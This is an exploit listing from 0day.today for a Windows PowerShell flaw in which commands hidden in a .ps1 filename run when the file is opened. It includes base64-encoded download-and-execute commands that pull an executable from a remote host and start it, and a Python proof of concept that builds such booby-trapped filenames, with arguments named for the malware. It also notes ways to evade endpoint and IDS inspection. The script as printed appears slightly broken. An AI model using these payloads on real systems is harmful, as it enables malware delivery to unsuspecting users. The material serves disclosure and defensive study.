Microsoft Windows PowerShell Command Execution Exploit

2019-08-06T00:00:00
ID 1337DAY-ID-33082
Type zdt
Reporter hyp3rlinx
Modified 2019-08-06T00:00:00

Description

Exploit for windows platform in category local exploits

                                        
                                            Microsoft Windows PowerShell Command Execution Exploit

[+] Credits: John Page (aka hyp3rlinx)    


[Vendor]
www.microsoft.com


[Product]
Windows PowerShell

Windows PowerShell is a Windows command-line shell designed especially for system administrators.
PowerShell includes an interactive prompt and a scripting environment that can be used independently or in combination.


[Vulnerability Type]
Unsanitized Filename Command Execution


[CVE Reference]
N/A


[Security Issue]
PowerShell can potentially execute arbitrary code when running specially named scripts due to trusting unsanitized filenames.
This occurs when ".ps1" files contain semicolons ";" or spaces as part of the filename, causing the execution of a different trojan file;
or the running of unexpected commands straight from the filename itself without the need for a second file.

For trojan files it doesn't need to be another PowerShell script and can be one of the following ".com, .exe, .bat, .cpl, .js, .vbs and .wsf.
Therefore, the vulnerably named file ".\Hello;World.ps1" will instead execute "hello.exe", if that script is invoked using the standard
Windows shell "cmd.exe" and "hello.exe" resides in the same directory as the vulnerably named script.

However, when such scripts are run from PowerShells shell and not "cmd.exe" the "&" (call operator) will block our exploit from working.

Still, if the has user enabled ".ps1" scripts to open with PowerShell as its default program, all it takes is double click the file to trigger 
the exploit and the "& call operator" will no longer save you. Also, if the user has not enabled PowerShell to open .ps1 scripts
as default; then running the script from cmd.exe like: c:\>powershell "\Hello;World.ps1" will also work without dropping into the PowerShell shell.

My PoC will download a remote executable save it to the victims machine and then execute it, and the PS files contents are irrelevant.
Also, note I use "%CD" to target the current working directory where the vicitm has initially opened it, after it calls "iwr" (invoke-webrequest)
abbreviated for space then it sleeps for 2 seconds and finally executes.

C:\>powershell [Convert]::ToBase64String([System.Text.Encoding]::Unicode.GetBytes("'powershell iwr 192.168.1.10/n -O %CD%\n.exe ;sleep -s 2;start n.exe'"))

This can undermine the integrity of PowerShell as it potentially allows unexpected code execution; even when the scripts contents are visually reviewed.
We may also be able to bypass some endpoint protection or IDS systems that may look at the contents or header of a file but not its filename where are
commands can be stored.

For this to work the user must have enabled PowerShell as its default program when opening ".ps1" files.

First, we create a Base64 encoded filename for obfuscation; that will download and execute a remote executable named in this case "n.exe".
c:\>powershell [Convert]::ToBase64String([System.Text.Encoding]::Unicode.GetBytes("'powershell iwr 192.168.1.10/n -O %CD%\n.exe ;sleep -s 2;start n.exe'"))

Give the PS script a normal begining name, then separate commands using ";" semicolon e.g.

Test;powershell -e <BASE64 ENCODED COMMANDS>;2.ps1

Create the executable without a file extension to save space for the filename then save it back using the -O parameter.
The "-e" is abbreviated for EncodedCommand to again save filename space.

Host the executable on web-server or just use python -m SimpleHTTPServer 80 or whatever.
Double click to open in PowerShell watch the file get downloaded saved and executed!

My example is used as a "filename embedded downloader", but obviously we can just call other secondary trojan files of various types in the same directory.

Note: User interaction is required, and obviously running any random PS script is dangerous... but hey we looked at the file content and it simply printed a string!


[Exploit / PoC]
from base64 import b64encode
import argparse,sys
#Windows PowerShell - Unsantized Filename Command Execution Vulnerability PoC
#Create ".ps1" files with Embedded commands to download, save and execute malware within a PowerShell Script Filename.
#Expects hostname/ip-addr of web-server housing the exploit.
#By hyp3rlinx
#Apparition Security
#====================


def parse_args():
    parser.add_argument("-i", "--ipaddress", help="Remote server to download and exec malware from.")
    parser.add_argument("-m", "--local_malware_name", help="Name for the Malware after downloading.")
    parser.add_argument("-r", "--remote_malware_name", help="Malwares name on remote server.")
    return parser.parse_args()

def main(args):
    PSEmbedFilenameMalwr=""
    if args.ipaddress:
        PSEmbedFilenameMalwr = "powershell iwr "+args.ipaddress+"/"+args.remote_malware_name+" -O %CD%\\"+args.local_malware_name+" ;sleep -s 2;start "+args.local_malware_name
    return b64encode(PSEmbedFilenameMalwr.encode('UTF-16LE'))

def create_file(payload):
    f=open("Test;PowerShell -e "+payload+";2.ps1", "w")
    f.write("Write-Output 'Have a nice day!'")
    f.close()

if __name__=="__main__":
    
    parser = argparse.ArgumentParser()
    PSCmds = main(parse_args())

    if len(sys.argv)==1:
        parser.print_help(sys.stderr)
        sys.exit(1)
        
    create_file(PSCmds)
    print "PowerShell - Unsantized Filename Command Execution File created!"
    print "By hyp3rlinx"




[POC Video URL]
https://www.youtube.com/watch?v=AH33RW9g8J4

#  0day.today [2019-12-04]  #